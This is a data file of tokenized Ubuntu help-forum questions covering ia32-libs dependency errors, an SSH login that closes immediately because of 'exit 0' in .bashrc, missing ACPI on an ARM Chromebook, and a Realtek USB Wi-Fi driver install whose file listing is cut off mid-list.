349628	can not install ia32-libs in ubuntu 12.04 64bit	when i try to install ia32-libs i got this error : asdfg @ notebook : ~ $ sudo apt-get install ia32-libs reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : adduser : depends : passwd ( > = 1:4.0.12 ) recommends : ecryptfs-utils ( > = 67-1 ) but it is not going to be installed ia32-libs : depends : ia32-libs-multiarch openssh-client : depends : passwd procps : depends : initscripts upstart : depends : initscripts depends : mountall depends : ifupdown ( > = 0.6.10ubuntu5 ) e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . when i try to install ia32-libs-multiarch : reading package lists ... building dependency tree ... reading state information ... some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : ia32-libs-multiarch : i386 : depends : bluez-alsa : i386 but it is not going to be installed depends : libgettextpo0 : i386 but it is not going to be installed depends : gstreamer0.10-plugins-base : i386 but it is not going to be installed depends : gstreamer0.10-plugins-good : i386 but it is not going to be installed depends : gtk2-engines : i386 but it is not going to be installed depends : gtk2-engines-murrine : i386 but it is not going to be installed depends : gtk2-engines-pixbuf : i386 but it is not going to be installed depends : gtk2-engines-oxygen : i386 but it is not going to be installed depends : gvfs : i386 but it is not going to be installed depends : ibus-gtk : i386 but it is not going to be installed depends : libacl1 : i386 but it is not going to be installed depends : libao4 : i386 but it is not going to be installed depends : libasound2 : i386 but it is not going to be installed depends : libasound2-plugins : i386 but it is not going to be installed depends : libasyncns0 : i386 but it is not going to be installed depends : libattr1 : i386 but it is not going to be installed depends : libaudio2 : i386 but it is not going to be installed depends : libcanberra-gtk-module : i386 but it is not going to be installed depends : libcap2 : i386 but it is not going to be installed depends : libcapi20-3 : i386 but it is not going to be installed depends : libcups2 : i386 but it is not going to be installed depends : libcupsimage2 : i386 but it is not going to be installed depends : libcurl3 : i386 but it is not going to be installed depends : libdbus-glib-1-2 : i386 but it is not going to be installed depends : libesd0 : i386 but it is not going to be installed depends : libfontconfig1 : i386 but it is not going to be installed depends : libfreetype6 : i386 but it is not going to be installed depends : libgail-common : i386 but it is not going to be installed depends : libgconf-2-4 : i386 but it is not going to be installed depends : libgdbm3 : i386 but it is not going to be installed depends : libglapi-mesa : i386 depends : libglu1-mesa : i386 but it is not going to be installed depends : libgphoto2-2 : i386 but it is not going to be installed depends : libgphoto2-port0 : i386 but it is not going to be installed depends : libgtk2.0-0 : i386 but it is not going to be installed depends : libmpg123-0 : i386 but it is not going to be installed depends : libncursesw5 : i386 but it is not going to be installed depends : libnspr4 : i386 but it is not going to be installed depends : libnss3 : i386 but it is not going to be installed depends : libodbc1 : i386 but it is not going to be installed depends : libopenal1 : i386 but it is not going to be installed depends : libpulse-mainloop-glib0 : i386 but it is not going to be installed depends : libqt4-dbus : i386 but it is not going to be installed depends : libqt4-network : i386 but it is not going to be installed depends : libqt4-opengl : i386 but it is not going to be installed depends : libqt4-qt3support : i386 but it is not going to be installed depends : libqt4-script : i386 but it is not going to be installed depends : libqt4-scripttools : i386 but it is not going to be installed depends : libqt4-sql : i386 but it is not going to be installed depends : libqt4-svg : i386 but it is not going to be installed depends : libqt4-test : i386 but it is not going to be installed depends : libqt4-xml : i386 but it is not going to be installed depends : libqt4-xmlpatterns : i386 but it is not going to be installed depends : libqtcore4 : i386 but it is not going to be installed depends : libqtgui4 : i386 but it is not going to be installed depends : libqtwebkit4 : i386 but it is not going to be installed depends : librsvg2-common : i386 but it is not going to be installed depends : libsane : i386 but it is not going to be installed depends : libsdl-mixer1.2 : i386 but it is not going to be installed depends : libsdl-image1.2 : i386 but it is not going to be installed depends : libsdl-net1.2 : i386 but it is not going to be installed depends : libsdl-ttf2.0-0 : i386 but it is not going to be installed depends : libsdl1.2debian : i386 but it is not going to be installed depends : libsqlite3-0 : i386 but it is not going to be installed depends : libssl0.9.8 : i386 but it is not going to be installed depends : libssl1.0.0 : i386 but it is not going to be installed depends : libstdc++5 : i386 but it is not going to be installed depends : libstdc++6 : i386 but it is not going to be installed depends : libxaw7 : i386 but it is not going to be installed depends : libxml2 : i386 but it is not going to be installed depends : libxp6 : i386 but it is not going to be installed depends : libxslt1.1 : i386 but it is not going to be installed depends : libxss1 : i386 but it is not going to be installed depends : libxtst6 : i386 but it is not going to be installed depends : odbcinst1debian2 : i386 but it is not going to be installed depends : libpulsedsp : i386 but it is not going to be installed depends : xaw3dg : i386 but it is not going to be installed recommends : libgl1-mesa-glx : i386 recommends : libgl1-mesa-dri : i386 output of sudo apt-get check : reading package lists ... done building dependency tree reading state information ... done how can i fix it ? i use ubuntu 12.04 64-bit .
349631	why is my ssh connection dropping immediately after i enter my password ?	so i 'm trying to get a connection between two ubuntu computers . this is what happens when i try to connect : jordan @ 0.0.0.2 : ~ $ ssh david @ 0.0.0.1 david @ 0.0.0.1 's password : welcome to ubuntu 12.04.1 lts ( gnu/linux 3.2.0-29-generic-pae i686 ) * documentation : https : //help.ubuntu.com/ last login : tue sep 24 13:18:04 2013 from jordan-h8-1437c.local you 'll feel devilish tonight . toss dynamite caps under a flamenco dancer's heel . connection to 0.0.0.1 closed . it does n't give an error it just closes the connection . output of ssh -vvv david @ 0.0.0.1 : jordan @ 0.0.0.2 : ~ $ ssh -vvv david @ 0.0.0.1 openssh_6.0p1 debian-3ubuntu1 , openssl 1.0.1c 10 may 2012 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug2 : ssh_connect : needpriv 0 debug1 : connecting to 0.0.0.1 [ 0.0.0.1 ] port 22. debug1 : connection established . debug3 : incorrect rsa1 identifier debug3 : could not load `` /home/jordan/.ssh/id_rsa '' as a rsa1 public key debug1 : identity file /home/jordan/.ssh/id_rsa type 1 debug1 : checking blacklist file /usr/share/ssh/blacklist.rsa-2048 debug1 : checking blacklist file /etc/ssh/blacklist.rsa-2048 debug1 : identity file /home/jordan/.ssh/id_rsa-cert type -1 debug1 : identity file /home/jordan/.ssh/id_dsa type -1 debug1 : identity file /home/jordan/.ssh/id_dsa-cert type -1 debug1 : identity file /home/jordan/.ssh/id_ecdsa type -1 debug1 : identity file /home/jordan/.ssh/id_ecdsa-cert type -1 debug1 : remote protocol version 2.0 , remote software version openssh_5.9p1 debian 5ubuntu1.1 debug1 : match : openssh_5.9p1 debian-5ubuntu1.1 pat openssh_5* debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_6.0p1 debian-3ubuntu1 debug2 : fd 3 setting o_nonblock debug3 : load_hostkeys : loading entries for host `` 0.0.0.1 '' from file `` /home/jordan/.ssh/known_hosts '' debug3 : load_hostkeys : found key type ecdsa in file /home/jordan/.ssh/known_hosts:31 debug3 : load_hostkeys : loaded 1 keys debug3 : order_hostkeyalgs : prefer hostkeyalgs : ecdsa-sha2-nistp256-cert- v01 @ openssh.com , ecdsa-sha2-nistp384-cert-v01 @ openssh.com , ecdsa-sha2-nistp521-cert- v01 @ openssh.com , ecdsa-sha2-nistp256 , ecdsa-sha2-nistp384 , ecdsa-sha2-nistp521 debug1 : ssh2_msg_kexinit sent debug1 : ssh2_msg_kexinit received debug2 : kex_parse_kexinit : ecdh-sha2-nistp256 , ecdh-sha2-nistp384 , ecdh-sha2- nistp521 , diffie-hellman-group-exchange-sha256 , diffie-hellman-group-exchange-sha1 , diffie- hellman-group14-sha1 , diffie-hellman-group1-sha1 debug2 : kex_parse_kexinit : ecdsa-sha2-nistp256-cert-v01 @ openssh.com , ecdsa-sha2- nistp384-cert-v01 @ openssh.com , ecdsa-sha2-nistp521-cert-v01 @ openssh.com , ecdsa-sha2- nistp256 , ecdsa-sha2-nistp384 , ecdsa-sha2-nistp521 , ssh-rsa-cert-v01 @ openssh.com , ssh-dss- cert-v01 @ openssh.com , ssh-rsa-cert-v00 @ openssh.com , ssh-dss-cert-v00 @ openssh.com , ssh- rsa , ssh-dss debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256- ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256- cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-sha2-256 , hmac- sha2-256-96 , hmac-sha2-512 , hmac-sha2-512-96 , hmac-ripemd160 , hmac- ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-sha2-256 , hmac-sha2-256-96 , hmac-sha2-512 , hmac-sha2-512-96 , hmac-ripemd160 , hmac- ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : none , zlib @ openssh.com , zlib debug2 : kex_parse_kexinit : none , zlib @ openssh.com , zlib debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : first_kex_follows 0 debug2 : kex_parse_kexinit : reserved 0 debug2 : kex_parse_kexinit : ecdh-sha2-nistp256 , ecdh-sha2-nistp384 , ecdh-sha2-nistp521 , diffie-hellman-group-exchange-sha256 , diffie-hellman-group-exchange-sha1 , diffie-hellman-group14-sha1 , diffie-hellman-group1-sha1 debug2 : kex_parse_kexinit : ssh-rsa , ssh-dss , ecdsa-sha2-nistp256 debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-sha2-256 , hmac- sha2-256-96 , hmac-sha2-512 , hmac-sha2-512-96 , hmac-ripemd160 , hmac- ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-sha2-256 , hmac-sha2-256-96 , hmac-sha2-512 , hmac-sha2-512-96 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : none , zlib @ openssh.com debug2 : kex_parse_kexinit : none , zlib @ openssh.com debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : first_kex_follows 0 debug2 : kex_parse_kexinit : reserved 0 debug2 : mac_setup : found hmac-md5 debug1 : kex : server- > client aes128-ctr hmac-md5 none debug2 : mac_setup : found hmac-md5 debug1 : kex : client- > server aes128-ctr hmac-md5 none debug1 : sending ssh2_msg_kex_ecdh_init debug1 : expecting ssh2_msg_kex_ecdh_reply debug1 : server host key : ecdsa 4f:0f : e0:40:19:6d:4b:66:99 : d1 : cc:06:9d : b8 : d2:05 debug3 : load_hostkeys : loading entries for host `` 0.0.0.1 '' from file `` /home/jordan/.ssh/known_hosts '' debug3 : load_hostkeys : found key type ecdsa in file /home/jordan/.ssh/known_hosts:31 debug3 : load_hostkeys : loaded 1 keys debug1 : host '0.0.0.1 ' is known and matches the ecdsa host key . debug1 : found key in /home/jordan/.ssh/known_hosts:31 debug1 : ssh_ecdsa_verify : signature correct debug2 : kex_derive_keys debug2 : set_newkeys : mode 1 debug1 : ssh2_msg_newkeys sent debug1 : expecting ssh2_msg_newkeys debug2 : set_newkeys : mode 0 debug1 : ssh2_msg_newkeys received debug1 : roaming not allowed by server debug1 : ssh2_msg_service_request sent debug2 : service_accept : ssh-userauth debug1 : ssh2_msg_service_accept received debug2 : key : /home/jordan/.ssh/id_rsa ( 0x7f5c591c97b0 ) debug2 : key : /home/jordan/.ssh/id_dsa ( ( nil ) ) debug2 : key : /home/jordan/.ssh/id_ecdsa ( ( nil ) ) debug1 : authentications that can continue : publickey , password debug3 : start over , passed a different list publickey , password debug3 : preferred gssapi-keyex , gssapi-with-mic , publickey , keyboard-interactive , password debug3 : authmethod_lookup publickey debug3 : remaining preferred : keyboard-interactive , password debug3 : authmethod_is_enabled publickey debug1 : next authentication method : publickey debug1 : offering rsa public key : /home/jordan/.ssh/id_rsa debug3 : send_pubkey_test debug2 : we sent a publickey packet , wait for reply debug1 : authentications that can continue : publickey , password debug1 : trying private key : /home/jordan/.ssh/id_dsa debug3 : no such identity : /home/jordan/.ssh/id_dsa debug1 : trying private key : /home/jordan/.ssh/id_ecdsa debug3 : no such identity : /home/jordan/.ssh/id_ecdsa debug2 : we did not send a packet , disable method debug3 : authmethod_lookup password debug3 : remaining preferred : , password debug3 : authmethod_is_enabled password debug1 : next authentication method : password david @ 0.0.0.1 's password : debug3 : packet_send2 : adding 64 ( len 57 padlen 7 extra_pad 64 ) debug2 : we sent a password packet , wait for reply debug1 : authentication succeeded ( password ) . authenticated to 0.0.0.1 ( [ 0.0.0.1 ] :22 ) . debug1 : channel 0 : new [ client-session ] debug3 : ssh_session2_open : channel_new : 0 debug2 : channel 0 : send open debug1 : requesting no-more-sessions @ openssh.com debug1 : entering interactive session . debug2 : callback start debug2 : client_session2_setup : id 0 debug2 : fd 3 setting tcp_nodelay debug3 : packet_set_tos : set ip_tos 0x10 debug2 : channel 0 : request pty-req confirm 1 debug1 : sending environment . debug3 : ignored env ssh_agent_pid debug3 : ignored env gpg_agent_info debug3 : ignored env term debug3 : ignored env shell debug3 : ignored env xdg_session_cookie debug3 : ignored env windowid debug3 : ignored env gnome_keyring_control debug3 : ignored env gtk_modules debug3 : ignored env user debug3 : ignored env ls_colors debug3 : ignored env xdg_session_path debug3 : ignored env xdg_seat_path debug3 : ignored env ssh_auth_sock debug3 : ignored env session_manager debug3 : ignored env defaults_path debug3 : ignored env xdg_config_dirs debug3 : ignored env path debug3 : ignored env desktop_session debug3 : ignored env pwd debug3 : ignored env gnome_keyring_pid debug1 : sending env lang = en_us.utf-8 debug2 : channel 0 : request env confirm 0 debug3 : ignored env mandatory_path debug3 : ignored env ubuntu_menuproxy debug3 : ignored env compiz_config_profile debug3 : ignored env gdmsession debug3 : ignored env shlvl debug3 : ignored env home debug3 : ignored env gnome_desktop_session_id debug3 : ignored env logname debug3 : ignored env compiz_bin_path debug3 : ignored env xdg_data_dirs debug3 : ignored env dbus_session_bus_address debug3 : ignored env lessopen debug3 : ignored env xdg_runtime_dir debug3 : ignored env display debug3 : ignored env xdg_current_desktop debug3 : ignored env lessclose debug3 : ignored env colorterm debug3 : ignored env xauthority debug3 : ignored env _ debug2 : channel 0 : request shell confirm 1 debug2 : callback done debug2 : channel 0 : open confirm rwindow 0 rmax 32768 debug2 : channel_input_status_confirm : type 99 id 0 debug2 : pty allocation request accepted on channel 0 debug2 : channel 0 : rcvd adjust 2097152 debug2 : channel_input_status_confirm : type 99 id 0 debug2 : shell request accepted on channel 0 welcome to ubuntu 12.04.1 lts ( gnu/linux 3.2.0-29-generic-pae i686 ) * documentation : https : //help.ubuntu.com/ last login : tue sep 24 13:25:28 2013 from jordan-h8-1437c.local a gift of a flower will soon be made to you . debug2 : channel 0 : rcvd eof debug2 : channel 0 : output open - > drain debug2 : channel 0 : obuf empty debug2 : channel 0 : close_write debug2 : channel 0 : output drain - > closed debug1 : client_input_channel_req : channel 0 rtype exit-status reply 0 debug1 : client_input_channel_req : channel 0 rtype eow @ openssh.com reply 0 debug2 : channel 0 : rcvd eow debug2 : channel 0 : close_read debug2 : channel 0 : input open - > closed debug2 : channel 0 : rcvd close debug3 : channel 0 : will not send data after close debug2 : channel 0 : almost dead debug2 : channel 0 : gc : notify user debug2 : channel 0 : gc : user detached debug2 : channel 0 : send close debug2 : channel 0 : is dead debug2 : channel 0 : garbage collecting debug1 : channel 0 : free : client-session , nchannels 1 debug3 : channel 0 : status : the following connections are open : # 0 client-session ( t4 r0 i3/0 o3/0 fd -1/-1 cc -1 ) connection to 0.0.0.1 closed . transferred : sent 2488 , received 1936 bytes , in 0.4 seconds bytes per second : sent 6062.2 , received 4717.2 debug1 : exit status 0` output of ssh david @ 0.0.0.1 cat .bashrc .bash_profile .profile .login : # ~/.bashrc : executed by bash ( 1 ) for non-login shells . # see /usr/share/doc/bash/examples/startup-files ( in the package bash-doc ) # for examples # if not running interactively , do n't do anything [ -z `` $ ps1 '' ] & & return # do n't put duplicate lines or lines starting with space in the history . # see bash ( 1 ) for more options histcontrol=ignoreboth # append to the history file , do n't overwrite it shopt -s histappend # for setting history length see histsize and histfilesize in bash ( 1 ) histsize=1000 histfilesize=2000 # check the window size after each command and , if necessary , # update the values of lines and columns . shopt -s checkwinsize # if set , the pattern `` ** '' used in a pathname expansion context will # match all files and zero or more directories and subdirectories . # shopt -s globstar # make less more friendly for non-text input files , see lesspipe ( 1 ) [ -x /usr/bin/lesspipe ] & & eval `` $ ( shell=/bin/sh lesspipe ) '' # set variable identifying the chroot you work in ( used in the prompt below ) if [ -z `` $ debian_chroot '' ] & & [ -r /etc/debian_chroot ] ; then debian_chroot= $ ( cat /etc/debian_chroot ) fi # set a fancy prompt ( non-color , unless we know we `` want '' color ) case `` $ term '' in xterm-color ) color_prompt=yes ; ; esac # uncomment for a colored prompt , if the terminal has the capability ; turned # off by default to not distract the user : the focus in a terminal window # should be on the output of commands , not on the prompt # force_color_prompt=yes if [ -n `` $ force_color_prompt '' ] ; then if [ -x /usr/bin/tput ] & & tput setaf 1 > & /dev/null ; then # we have color support ; assume it 's compliant with ecma-48 # ( iso/iec-6429 ) . ( lack of such support is extremely rare , and such # a case would tend to support setf rather than setaf . ) color_prompt=yes else color_prompt= fi fi if [ `` $ color_prompt '' = yes ] ; then ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \ [ \033 [ 01 ; 32m\ ] \u @ \h\ [ \033 [ 00m\ ] : \ [ \033 [ 01 ; 34m\ ] \w\ [ \033 [ 00m\ ] \ $ ' else ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\ $ ' fi unset color_prompt force_color_prompt # if this is an xterm set the title to user @ host : dir case `` $ term '' in xterm*|rxvt* ) ps1= '' \ [ \e ] 0 ; $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\a\ ] $ ps1 '' ; ; * ) ; ; esac # enable color support of ls and also add handy aliases if [ -x /usr/bin/dircolors ] ; then test -r ~/.dircolors & & eval `` $ ( dircolors -b ~/.dircolors ) '' || eval `` $ ( dircolors -b ) '' alias ls='ls -- color=auto' # alias dir='dir -- color=auto' # alias vdir='vdir -- color=auto' alias grep='grep -- color=auto' alias fgrep='fgrep -- color=auto' alias egrep='egrep -- color=auto' fi # some more ls aliases alias ll='ls -alf' alias la='ls -a' alias l='ls -cf' # add an `` alert '' alias for long running commands . use like so : # sleep 10 ; alert alias alert='notify-send -- urgency=low -i `` $ ( [ $ ? = 0 ] & & echo terminal || echo error ) '' `` $ ( history|tail -n1|sed -e '\ '' s/^\s* [ 0-9 ] \+\s*// ; s/ [ ; & | ] \s*alert $ //'\ '' ) '' ' # alias definitions . # you may want to put all your additions into a separate file like # ~/.bash_aliases , instead of adding them here directly . # see /usr/share/doc/bash-doc/examples in the bash-doc package . if [ -f ~/.bash_aliases ] ; then . ~/.bash_aliases fi # enable programmable completion features ( you do n't need to enable # this , if it 's already enabled in /etc/bash.bashrc and /etc/profile # sources /etc/bash.bashrc ) . if [ -f /etc/bash_completion ] & & ! shopt -oq posix ; then . /etc/bash_completion fi path= $ path : $ home/.rvm/bin # add rvm to path for scripting [ [ -s `` /home/david/.rvm/scripts/rvm '' ] ] & & source `` /home/david/.rvm/scripts/rvm '' [ [ -s `` /home/david/.rvm/scripts/rvm '' ] ] & & source `` /home/david/.rvm/scripts/rvm '' fortune # [ [ -s `` $ home/.rvm/scripts/rvm '' ] ] & & source `` $ home/.rvm/scripts/rvm '' # load rvm into a shell session *as a function* fortune exit 0 # ~/.profile : executed by the command interpreter for login shells . # this file is not read by bash ( 1 ) , if ~/.bash_profile or ~/.bash_login # exists . # see /usr/share/doc/bash/examples/startup-files for examples . # the files are located in the bash-doc package . # the default umask is set in /etc/profile ; for setting the umask # for ssh logins , install and configure the libpam-umask package . # umask 022 # if running bash if [ -n `` $ bash_version '' ] ; then # include .bashrc if it exists if [ -f `` $ home/.bashrc '' ] ; then . `` $ home/.bashrc '' fi fi # set path so it includes user 's private bin if it exists if [ -d `` $ home/bin '' ] ; then path= '' $ home/bin : $ path '' fi cat : .login : no such file or directory
349632	enable acpi on ubuntu 13.04 arm chromebook	i 've just recently installed ubuntu 12.04 onto my samsung arm chromebook , using http : //chromeos-cr48.blogspot.com/2013/05/chrubuntu-one-script-to-rule-them-all_31.html , then upgraded to 13.10 . i 'm having one problem with suspend , where all of the following will wake it from suspend : touching the touchpad closing the computer lid ( this one is a bit problematic ) touching any key on the keyboard i found http : //ubuntuforums.org/showthread.php ? t=2088620 , and tried to follow the directions involving /proc/acpi/wakeup , but the /proc/acpi directory does n't exist . the command acpi_available exits exit status 1 , indicating that it acpi is not available . ok , update here . i 've gotten suspend practically fixed using a chromebook-snooze-hack package from the chromebook arm ppa . but the problem remains that there is no acpi available . my new goal here is to get acpi enabled/available .
349634	compilation error when installing realtek 8192cu driver	i 'm using a laptop with ubuntu 13.04 64 bits . after `` fighting '' for some time , i gave up trying to have my realtek 8188ce wireless card work properly ( the wifi connection is annoyingly unstable ) . so i decided to buy a wireless usb adapter ( usb stick ) . it 's a d-link wireless n 150 micro usb adapter dwa-121 . to get it working , one needs to download and install the realtek driver 8192cu from here ( and load the 8192cu module ) . i 've done it successfully in the past , but i 've also encountered the same problem as what follows . i think it worked after some upgrades , but right now i ca n't find a fix . i 've upgraded linux-headers-generic , linux-source and build-essential , to no avail . after downloading the driver , one must run the install.sh script to install it . my problem is i get the following compilation error : root @ brice-laptopldlc : /home/brice/téléchargements/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105 # ./install.sh # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # realtek wi-fi driver auto installation script novembor , 21 2011 v1.1.0 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # decompress the driver source tar ball : rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105.tar.gz rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/ rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/clean rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/ rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/ieee80211.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_ht.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/sdio_osintf.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_ioctl.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192c_event.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_rf.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192d_rf.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192c_sreset.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192d_hal.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/recv_osdep.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192c_recv.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192c_cmd.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/byteorder/ rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/byteorder/generic.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/byteorder/little_endian.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/byteorder/swabb.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/byteorder/swab.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/byteorder/big_endian.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/pci_osintf.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/sdio_ops.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/hal8192cphyreg.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/osdep_service.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/usb_osintf.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192c_spec.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/pci_hal.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/hal8192cphycfg.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_pwrctrl.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192d_cmd.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/hal8192detesthwimg.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_version.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/ethernet.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_br_ext.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_qos.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_p2p.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192d_xmit.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/xmit_osdep.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_mp_ioctl.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192c_xmit.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192d_spec.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/usb_hal.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/pci_ops.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_mp.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/hal8192cehwimg.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/mlme_osdep.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/h2clbk.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/sdio_ops_xp.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/usb_vendor_req.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_eeprom.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/farray.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/hal8192dphycfg.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/ioctl_cfg80211.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192d_dm.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/if_ether.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/drv_types_ce.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_security.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_ioctl_rtl.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/hal8192duhwimg.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/hal8192cuhwimg_wowlan.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192d_led.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192c_led.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/wlan_bssdef.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_mlme_ext.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/hal8192dphyreg.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/wifi.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192d_recv.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_event.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/hal8192dehwimg.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/hal8192cuhwimg.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/nic_spec.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/osdep_intf.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/sdio_ops_ce.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/sdio_ops_linux.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/circ_buf.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_byteorder.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_xmit.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/hal8192duhwimg_wowlan.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_ioctl_set.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_recv.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192c_dm.h 